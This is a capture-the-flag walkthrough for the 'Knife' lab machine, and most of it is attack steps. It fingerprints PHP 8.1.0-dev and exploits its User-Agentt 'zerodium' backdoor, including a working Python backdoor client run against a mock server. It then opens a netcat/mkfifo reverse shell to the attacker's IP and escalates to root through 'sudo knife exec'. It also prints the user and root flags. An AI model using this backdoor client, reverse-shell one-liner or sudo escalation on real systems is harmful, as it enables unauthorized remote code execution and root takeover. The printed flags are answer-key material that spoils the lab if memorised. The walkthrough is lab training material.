
Knife


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.10.10.242

Port 80 is open, so let's grab the HTTP response headers:

curl -I 10.10.10.242

The X-Powered-By header reports PHP/8.1.0-dev. Let's search for a php/8.1.0-dev exploit and see what we can find.

We find this exploit on exploit-db: https://www.exploit-db.com/exploits/49933


It says:

"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host."

In short: the malicious commit landed in the php-src git repository on March 28th 2021 and was reverted within a day, so it never shipped in a tagged release, but a development build of that snapshot, like the one on this box, still carries it. Any request whose User-Agentt header contains the trigger word is evaluated as PHP code, so no authentication is needed.

Let's download the exploit to our VM and run it:

python3 49933.py

Enter the URL of the target machine when prompted.

We got the shell!


id
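To make the mechanism concrete, here is an added example (my own code, not the exploit-db script and not the page's own): a minimal client for the User-Agentt backdoor, run against a constructed mock server so it works offline. The mock reproduces only the trigger logic (the header contains "zerodium", everything after the first eight characters is evaluated as PHP before the script's own output) and resolves system('...') calls against a canned table; the "www-data" output, the port and the page body are all made up for the example, and the mock understands only plain system() calls.

```python
"""Added example, not the exploit-db script or the page's own code.

Minimal client for the PHP 8.1.0-dev "User-Agentt" backdoor, exercised
against a constructed mock server so everything runs offline. The real
backdoor sat in ext/zlib: if the User-Agentt header contained "zerodium",
everything after the first eight characters was passed to zend_eval_string()
before the script's own output. The mock imitates just that trigger and
resolves system('...') against a canned table; nothing is executed.
"""
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MAGIC = "zerodium"

# Constructed stand-ins for command output on the target (not real data).
FAKE_OUTPUT = {
    "id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
    "whoami": "www-data\n",
}


class MockBackdooredPHP(BaseHTTPRequestHandler):
    """Constructed stand-in for a web server running the backdoored build."""

    def log_message(self, *args):  # silence per-request logging
        pass

    def _page(self, head_only):
        body = "<html><body>normal page</body></html>\n"
        ua = self.headers.get("User-Agentt", "")
        if MAGIC in ua:  # strstr() check, then skip the 8-byte magic word
            code = ua[len(MAGIC):].strip()
            # The real backdoor evals arbitrary PHP; the mock only knows
            # system('<plain command>') and looks the command up.
            m = re.fullmatch(r"system\('([^']*)'\);?", code)
            if m:
                body = FAKE_OUTPUT.get(m.group(1), "") + body
        data = body.encode()
        self.send_response(200)
        self.send_header("X-Powered-By", "PHP/8.1.0-dev")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        if not head_only:
            self.wfile.write(data)

    def do_GET(self):
        self._page(False)

    def do_HEAD(self):
        self._page(True)


def start_mock_server():
    """Bind the mock on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), MockBackdooredPHP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def looks_backdoored(url):
    """The curl -I fingerprint from the enumeration step, in code."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.headers.get("X-Powered-By") == "PHP/8.1.0-dev"


def send_user_agentt(url, value):
    """One GET with an arbitrary User-Agentt header; returns the body text."""
    req = urllib.request.Request(url, headers={"User-Agentt": value})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode(errors="replace")


def php_backdoor_exec(url, cmd):
    """Run cmd through the backdoor: magic word + a PHP system() call.

    Each call is an independent HTTP request, which is why the exploit's
    pseudo-shell keeps no state such as the working directory.
    """
    php = "system('%s');" % cmd.replace("'", "\\'")
    return send_user_agentt(url, MAGIC + php)


if __name__ == "__main__":
    srv, base = start_mock_server()
    print("backdoored build:", looks_backdoored(base))
    print(php_backdoor_exec(base, "id"), end="")
    srv.shutdown()
```

Pointing php_backdoor_exec at a real backdoored host is the whole exploit; the fingerprint check and the negative case (the same PHP code without the magic word is just an odd header and is never evaluated) are what you would reuse in a detection or a scanner.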

The shell is not very interactive: every command is sent as a separate HTTP request through the backdoor, so nothing persists between commands and cd has no effect. We can use this trick to get a real shell:


On your VM, open a new terminal and start a listener:

nc -lnvp 1234

Then, in the pseudo-shell on the target, run the following (replace 10.10.14.3 with your VM's IP on the VPN):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f

Switch back to the netcat window: you should have a shell. Upgrade it to a TTY with:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we have a proper shell!


219a816d297ab93af1acdf0989cbe5c4


Congratulations! You got the user flag!



Now let's try to get the root flag:

Reading /root/root.txt as the current user is denied, so we need to escalate our privileges.



Privilege Escalation

sudo -l

The output shows that the knife command can be run as root through sudo without a password (NOPASSWD).


knife is the Chef command-line tool, and knife exec evaluates Ruby code (the -E option takes the code as a string). Since it runs as root under sudo, any system() call inside that Ruby runs as root too, which gives us this command:


sudo knife exec -E 'system("cat /root/root.txt")'

286187c400154744a5fe9a38e9229798


Congratulations! You got the root flag!
